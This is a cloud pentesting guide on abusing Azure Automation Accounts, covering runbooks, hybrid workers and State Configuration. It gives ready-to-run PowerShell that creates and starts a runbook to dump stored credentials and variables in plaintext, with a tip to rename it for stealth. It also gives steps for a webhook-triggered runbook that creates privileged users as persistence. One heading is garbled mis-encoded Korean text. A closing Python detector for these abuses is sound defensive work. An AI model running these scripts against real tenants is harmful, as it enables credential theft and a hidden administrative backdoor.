Az - Automation Account


Basic Information

From the docs: Azure Automation delivers a cloud-based automation, operating system update, and configuration service that supports consistent management across your Azure and non-Azure environments. It includes process automation, configuration management, update management, shared capabilities, and heterogeneous features.

These are like "scheduled tasks" in Azure: they let you execute actions (or even scripts) to manage, check and configure the Azure environment.

Run As Account

When a Run As Account is used, an Azure AD application with a self-signed certificate is created, a service principal is created, and the Contributor role is assigned to that account in the current subscription (a lot of privileges). Microsoft recommends using a Managed Identity for the Automation Account instead.

Run As Accounts will be removed on September 30, 2023 and replaced by Managed Identities.

Runbooks & Jobs

Runbooks allow you to execute arbitrary PowerShell code. An attacker could abuse this to steal the permissions of the principal attached to the Automation Account (if any). The code of Runbooks may also contain sensitive information (such as credentials).

If you can read the jobs, do so: they contain the output of each run (potentially sensitive information).

Go to Automation Accounts --> <Select Automation Account> --> Runbooks/Jobs/Hybrid worker groups/Watcher tasks/credentials/variables/certificates/connections.

Hybrid Worker

A Runbook can run in a container inside Azure or on a Hybrid Worker (a non-Azure machine). The Log Analytics Agent is deployed on the VM to register it as a Hybrid Worker. Hybrid Worker jobs run as SYSTEM on Windows and as the nxautomation account on Linux. Each Hybrid Worker is registered in a Hybrid Worker Group.

Therefore, if you can choose to run a Runbook on a Windows Hybrid Worker, you will execute arbitrary commands inside an external machine as SYSTEM (a nice pivot technique).

Compromise State Configuration (SC)

From the docs: Azure Automation State Configuration is an Azure configuration management service that allows you to write, manage, and compile PowerShell Desired State Configuration (DSC) configurations for nodes in any cloud or on-premises datacenter. The service also imports DSC Resources and assigns configurations to target nodes, all in the cloud. You can access Azure Automation State Configuration in the Azure portal by selecting State configuration (DSC) under Configuration Management.

You can find sensitive information in these configurations.

RCE

It's possible to abuse State Configuration to run arbitrary scripts on the managed machines.

Az - State Configuration RCE

Enumeration

# Check the user's rights over Automation
az extension add --upgrade -n automation
az automation account list # if it doesn't return anything the user is not a part of an Automation group

# Gets Azure Automation accounts in a resource group
Get-AzAutomationAccount

# List & get DSC configs
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration
Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -match '<name>'} | Export-AzAutomationDscConfiguration -OutputFolder . -Debug
## Automation Accounts named SecurityBaselineConfigurationWS... are there by default (not interesting)

# List & export Runbook code
Get-AzAutomationAccount | Get-AzAutomationRunbook
Get-AzAutomationAccount | Get-AzAutomationRunbook | Export-AzAutomationRunbook -OutputFolder /tmp

# List credentials & variables & others
Get-AzAutomationAccount | Get-AzAutomationCredential
Get-AzAutomationAccount | Get-AzAutomationVariable
Get-AzAutomationAccount | Get-AzAutomationConnection
Get-AzAutomationAccount | Get-AzAutomationCertificate
Get-AzAutomationAccount | Get-AzAutomationSchedule
Get-AzAutomationAccount | Get-AzAutomationModule
Get-AzAutomationAccount | Get-AzAutomationPython3Package
## Exfiltrate credentials & variables and the other info loading them in a Runbook and printing them

# List hybrid workers
Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>

์ž๋™ํ™” ๊ณ„์ •์—์„œ Run Book์„ ์‚ฌ์šฉํ•˜์—ฌ ์ •์˜๋œ ์ž๊ฒฉ ์ฆ๋ช… ๋ฐ ๋ณ€์ˆ˜๋ฅผ ์™ธ๋ถ€๋กœ ์œ ์ถœํ•˜๊ธฐ

# Change the credential & variable names and add as many as you need
@'
$creds = Get-AutomationPSCredential -Name <credentials_name>
$runbook_variable = Get-AutomationVariable -Name <variable_name>
$runbook_variable
$creds.GetNetworkCredential().username
$creds.GetNetworkCredential().password
'@ | Out-File -Encoding ascii 'runbook_get_creds.ps1'

$ResourceGroupName = '<resource_group_name>'
$AutomationAccountName = '<auto_acc_name>'
$RunBookName = 'Exif-Credentials' # Change this for stealth

# Create the Runbook, import the script, publish it, start it, and read the job output
New-AzAutomationRunbook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Type PowerShell
Import-AzAutomationRunbook -Path 'runbook_get_creds.ps1' -Name $RunBookName -Type PowerShell -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Force
Publish-AzAutomationRunbook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
$start = Start-AzAutomationRunbook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
Start-Sleep 20 # Give the job time to finish before collecting its output streams
($start | Get-AzAutomationJob | Get-AzAutomationJobOutput).Summary

It's also possible to modify an existing Runbook from the web console and do the same.

Steps for Setting Up Automated Privileged User Creation

1. Initialize the Automation Account

  • Action required: create a new Automation Account.

  • Specific setting: make sure "Create Azure Run As account" is enabled.

2. Runbook import and setup

  • Source: download the sample runbook from the MicroBurst GitHub repository.

  • Actions required:

    • Import the runbook into the Automation Account.

    • Publish the runbook so that it becomes executable.

    • Attach a webhook to the runbook to enable external triggers.

3. AzureAD module configuration

  • Action required: add the AzureAD module to the Automation Account.

  • Additional step: make sure all Azure Automation modules are updated to their latest versions.

4. Permission assignment

  • Roles to assign:

    • User Administrator

    • Subscription Owner

  • Target: assign these roles to the Automation Account so it has the necessary permissions.

5. Awareness of potential access loss

  • Note: be aware that setting up this automation may result in losing control over the subscription.

6. User creation trigger

  • Trigger the webhook by sending a POST request to create a new user.

  • Use the PowerShell script below, replacing $uri with the actual webhook URL and updating $AccountInfo with the desired username and password.

$uri = "<YOUR_WEBHOOK_URL>"
$AccountInfo  = @(@{RequestBody=@{Username="<DESIRED_USERNAME>";Password="<DESIRED_PASSWORD>"}})
$body = ConvertTo-Json -InputObject $AccountInfo
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
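Both flows above leave a distinctive trail in the Azure Activity Log: the exfiltration script creates, publishes and starts a runbook within seconds under one caller, and the persistence setup attaches a webhook to a runbook. The following Python is an added defender-side example, not part of the original page: it correlates those Microsoft.Automation operations over constructed sample events (the subscription id, callers and resource names are placeholders).

```python
"""Flag two Automation-account abuse patterns from this page in Azure Activity Log events:
an ad-hoc runbook (create -> publish -> job start by one caller within a short window) and a
webhook being attached to a runbook. Added example, not from the page; events are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Microsoft.Automation operation names the page's exfiltration and persistence steps emit.
RUNBOOK_WRITE = "Microsoft.Automation/automationAccounts/runbooks/write"
RUNBOOK_PUBLISH = "Microsoft.Automation/automationAccounts/runbooks/publish/action"
JOB_WRITE = "Microsoft.Automation/automationAccounts/jobs/write"
WEBHOOK_WRITE = "Microsoft.Automation/automationAccounts/webhooks/write"
def _rid(account, child):  # constructed resource id; "0000" is a placeholder subscription
    return f"/subscriptions/0000/resourceGroups/rg1/providers/Microsoft.Automation/automationAccounts/{account}{child}"
SAMPLE_EVENTS = [  # constructed records in the Activity Log's operationName/caller/resourceId shape (UTC)
    {"time": "2024-05-01T09:00:00Z", "caller": "ops@contoso.example", "operationName": RUNBOOK_WRITE, "resourceId": _rid("aa2", "/runbooks/Patch-VMs")},
    {"time": "2024-05-01T10:00:05Z", "caller": "mallory@contoso.example", "operationName": RUNBOOK_WRITE, "resourceId": _rid("aa1", "/runbooks/Exif-Credentials")},
    {"time": "2024-05-01T10:00:40Z", "caller": "mallory@contoso.example", "operationName": RUNBOOK_PUBLISH, "resourceId": _rid("aa1", "/runbooks/Exif-Credentials")},
    {"time": "2024-05-01T10:01:10Z", "caller": "mallory@contoso.example", "operationName": JOB_WRITE, "resourceId": _rid("aa1", "/jobs/1f3a")},
    {"time": "2024-05-01T10:05:00Z", "caller": "mallory@contoso.example", "operationName": WEBHOOK_WRITE, "resourceId": _rid("aa1", "/webhooks/wh1")},
]

def _account(resource_id):
    # Reduce a runbook/job/webhook resource id to its parent automation account id.
    parts = resource_id.split("/")
    return "/".join(parts[: parts.index("automationAccounts") + 2]).lower()

def find_adhoc_runbook_runs(events, window_minutes=30):
    """Same caller creates, publishes and starts a runbook in one account within the window."""
    groups = defaultdict(list)
    for e in events:
        if e["operationName"] in (RUNBOOK_WRITE, RUNBOOK_PUBLISH, JOB_WRITE):
            key = (e["caller"].lower(), _account(e["resourceId"]))
            groups[key].append((datetime.strptime(e["time"], "%Y-%m-%dT%H:%M:%SZ"), e["operationName"]))
    hits, window = [], timedelta(minutes=window_minutes)
    for (caller, account), evs in groups.items():
        evs.sort()
        for t0, op in evs:
            if op != RUNBOOK_WRITE:
                continue
            later = [(t, o) for t, o in evs if t0 <= t <= t0 + window]
            pub = next((t for t, o in later if o == RUNBOOK_PUBLISH), None)
            job = next((t for t, o in later if o == JOB_WRITE and pub and t >= pub), None)
            if pub and job:
                hits.append({"caller": caller, "account": account, "created": t0, "started": job})
                break  # one alert per caller/account pair is enough
    return hits

def find_webhook_creations(events):
    """A webhook on a runbook is an unauthenticated external trigger: surface every one created."""
    return [{"caller": e["caller"], "account": _account(e["resourceId"]), "time": e["time"]}
            for e in events if e["operationName"] == WEBHOOK_WRITE]
```

In production the same functions would be fed from an Activity Log export or the AzureActivity table in Log Analytics, and the webhook alert should be joined with role assignments made to the Automation Account's identity.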
